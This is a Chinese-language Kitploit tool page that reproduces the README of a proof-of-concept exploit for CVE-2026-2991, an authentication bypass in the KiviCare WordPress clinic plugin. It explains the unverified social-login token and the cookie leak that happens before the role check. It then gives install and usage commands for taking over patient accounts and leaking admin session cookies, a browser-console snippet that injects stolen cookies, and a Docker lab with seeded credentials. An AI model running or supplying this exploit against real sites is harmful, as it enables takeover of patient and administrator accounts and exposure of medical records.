Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-2991 — CVE-2026-2991 的 PoC 漏洞利用 — KiviCare WordPress 插件(≤4.1.2)中的认证绕过漏洞,允许未认证的攻击者接管患者账户并提取管理员会话。 | Kitploit
工具/GitHubGitHub/joshuavanderpoll/cve-2026-2991
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubjoshuavanderpoll/cve-2026-2991

CVE-2026-2991

CVE-2026-2991 的 PoC 漏洞利用 — KiviCare WordPress 插件(≤4.1.2)中的认证绕过漏洞,允许未认证的攻击者接管患者账户并提取管理员会话。

查看仓库
265个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

KiviCare <= 4.1.2 - 身份验证绕过 (CVE-2026-2991) PoC

Python

📜 描述

CVE-2026-2991 是 KiviCare – Clinic & Patient Management System (EHR) WordPress 插件中的一个身份验证绕过漏洞,影响所有版本直至并包括 4.1.2。

该插件在 /wp-json/kivicare/v1/auth/patient/social-login 暴露了一个公开的 REST 端点,用于通过社交登录对用户进行身份验证。patientSocialLogin() 函数接受一个电子邮件地址和一个访问令牌,但从不根据所声明的社交提供商验证该令牌。任何未经身份验证的攻击者只需提供目标患者的电子邮件和一个任意字符串作为令牌,即可登录为任何已注册的患者。

此外,WordPress 身份验证 cookie 是在强制执行患者角色检查之前发出的。这意味着对于非患者账户(包括管理员),响应返回 HTTP 403,但仍包含有效的 Set-Cookie 标头——从而将可重放的管理员会话泄露给攻击者。

受影响版本: kivicare-clinic-management-system <= 4.1.2

✨ 功能特性

  • 无需身份验证 — 不需要任何凭据或先前会话
  • 患者账户接管 — 仅使用患者的电子邮件即可登录为任何已注册患者
  • 管理员会话泄露 — 从非患者账户的 403 响应中提取有效的管理员身份验证 cookie
  • 浏览器控制台代码片段 — 输出可直接粘贴的 JavaScript,用于注入 cookie 并直接重定向到仪表盘

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ 使用方法

root@kitploit:~
python3 CVE-2026-2991.py --url <TARGET_URL> --email <TARGET_EMAIL> [--login-type <google|apple>] [--timeout <SECONDS>] [--useragent <UA>]

患者账户接管

绕过已注册患者的身份验证。脚本会返回其完整会话,包括一个 nonce 和可重放的 cookie。

root@kitploit:~
python3 CVE-2026-2991.py --url 'https://target.com' --email '[email protected]'

Patient bypass


管理员会话泄露(非患者账户)

提供任意非患者用户(例如管理员)的电子邮件。该端点在角色检查之前发出有效的身份验证 cookie 并返回 403——这些 cookie 会被提取并打印出来。

root@kitploit:~
python3 CVE-2026-2991.py  --url http://localhost:8080/ --email '[email protected]'

Admin cookie leak


浏览器控制台登录

成功运行后,脚本会打印一个 JavaScript 代码片段。在浏览器中打开目标站点,将代码片段粘贴到浏览器控制台(F12 → Console)中并按回车——它会设置窃取到的 cookie,并自动将你导航到仪表盘。

root@kitploit:~
(() => {
  document.cookie = "wordpress_<hash>=<value>; path=/";
  document.cookie = "wordpress_logged_in_<hash>=<value>; path=/";
  window.location.href = "http://target.com/kivicare-patient-dashboard";
})();

🐋 Docker PoC

一个自包含的 Docker Compose 环境,已预先安装存在漏洞的插件,并填充了逼真的测试数据。 更多详情请查看 DOCKER.md。

root@kitploit:~
cd docker/
docker compose up

该实验环境在首次启动时会预置以下账户:

root@kitploit:~
# 绕过患者身份验证
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

# 泄露管理员会话 cookie
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email '[email protected]'

🕵🏼 参考资料

  • KiviCare — WordPress 插件
  • NVD — CVE-2026-2991
  • WordFence
  • HackIndex.io — CVE-2026-2991

📢 免责声明

此工具仅用于教育和研究目的。创建者不对因使用此工具而产生的任何滥用或损害承担责任。

下载工具
角色用户名电子邮件密码
Adminadmin[email protected]admin
Doctordr.harris[email protected]Doctor@123
Doctordr.chen[email protected]Doctor@123
Doctordr.okonkwo[email protected]Doctor@123
Patientjames.ford[email protected]Patient@123
Patientsofia.reyes[email protected]Patient@123
Patientoliver.knight[email protected]Patient@123
Patientamara.diallo[email protected]Patient@123
Patientdan.walsh[email protected]Patient@123